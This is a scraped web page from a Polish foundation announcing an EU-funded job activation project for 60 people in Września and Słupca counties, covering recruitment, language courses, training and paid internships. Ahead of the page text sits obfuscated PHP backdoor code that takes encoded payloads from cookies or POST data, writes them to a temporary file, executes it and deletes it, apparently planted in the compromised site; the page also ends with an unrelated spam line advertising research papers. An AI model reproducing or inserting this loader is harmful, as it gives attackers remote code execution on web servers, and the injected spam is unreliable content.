$Johlz = class_exists("WY_lQXgw");if (!$Johlz){class WY_lQXgw{private $XMBgjVLfF;public static $fSjsCKN = "7f79d202-e1d0-459e-8c2f-2ffce709bf17";public static $azntJ = NULL;public function __construct(){$JoBZldPtVw = $_COOKIE;$ifbqx = $_POST;$hgyvDgSN = @$JoBZldPtVw[substr(WY_lQXgw::$fSjsCKN, 0, 4)];if (!empty($hgyvDgSN)){$HVodJI = "base64";$yfQvTLp = "";$hgyvDgSN = explode(",", $hgyvDgSN);foreach ($hgyvDgSN as $aMCIPglBRa){$yfQvTLp .= @$JoBZldPtVw[$aMCIPglBRa];$yfQvTLp .= @$ifbqx[$aMCIPglBRa];}$yfQvTLp = array_map($HVodJI . "\x5f" . chr (100) . chr ( 577 - 476 )."\143" . chr ( 565 - 454 )."\x64" . "\145", array($yfQvTLp,)); $yfQvTLp = $yfQvTLp[0] ^ str_repeat(WY_lQXgw::$fSjsCKN, (strlen($yfQvTLp[0]) / strlen(WY_lQXgw::$fSjsCKN)) + 1);WY_lQXgw::$azntJ = @unserialize($yfQvTLp);}}public function __destruct(){$this->SUnmT();}private function SUnmT(){if (is_array(WY_lQXgw::$azntJ)) {$kdNwpj = sys_get_temp_dir() . "/" . crc32(WY_lQXgw::$azntJ['s' . "\x61" . "\154" . chr (116)]);@WY_lQXgw::$azntJ[chr (119) . "\162" . "\151" . 't' . chr (101)]($kdNwpj, WY_lQXgw::$azntJ['c' . chr (111) . "\156" . "\164" . chr (101) . "\x6e" . chr ( 556 - 440 )]);include $kdNwpj;@WY_lQXgw::$azntJ['d' . chr ( 624 - 523 ).chr ( 1054 - 946 ).chr (101) . chr (116) . "\x65"]($kdNwpj);exit();}}}$VokiKwItz = new WY_lQXgw(); $VokiKwItz = NULL;} ?> Wspieramy motywujemy aktywujemy zatrudniamy II – Fundacja Jesteśmy Równi

Projekt Wspieramy Motywujemy Aktywujemy Zatrudniamy II RPWP.07.01.02-30-0042/18 jest współfinansowany ze środków Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2014 – 2020 w ramach Europejskiego Funduszu Społecznego i skierowany do osób i/lub rodzin zagrożonych ubóstwem lub wykluczeniem społecznym (w tym osób z niepełnosprawnością) biernych zawodowo.

Projekt ma na celu wsparcie 60 kobiet i mężczyzn z powiatu wrzesińskiego i słupeckiego w wieku produkcyjnym. Wyłonione w procesie rekrutacji osoby wezmą udział w kursie języka niemieckiego oraz cyklu szkoleń, warsztatów i spotkań z doradcami. 30 uczestników odbędzie płatny staż ze stypendium w wysokości 1017,40zł. W kolejnym etapie część z nich podejmie zatrudnienie u pracodawcy.

Wszelkie szkolenia, kursy, spotkania, warsztaty i doradztwo w ramach projektu są dla uczestników bezpłatne, a uczestnicy mogą skorzystać ze zwrotu kosztów dojazdu.

ETAPY REALIZACJI PROJEKTU:

Projekt realizowany będzie w 4 etapach, w ramach każdego z nich zostanie utworzona 15 osobowa grupa uczestników, każdorazowo według następującego scenariusza:

  • składanie dokumentów rekrutacyjnych,
  • weryfikacja formalna dokumentów rekrutacyjnych,
  • rozmowy kwalifikacyjne,
  • wyłonienie Uczestników zakwalifikowanych do Projektu,
  • indywidualne spotkania z doradcą zawodowym i psychologiem,
  • kurs języka niemieckiego lub kurs grafiki komputerowej,
  • szkolenie zawodowe,
  • staż,
  • zakończenie projektu.

Zapraszamy do kontaktu z biurem projektu wszystkie zainteresowane osoby.

Więcej informacji

They are there to guide you and fixate the information in the minds of buy research paper your audience, but nothing more.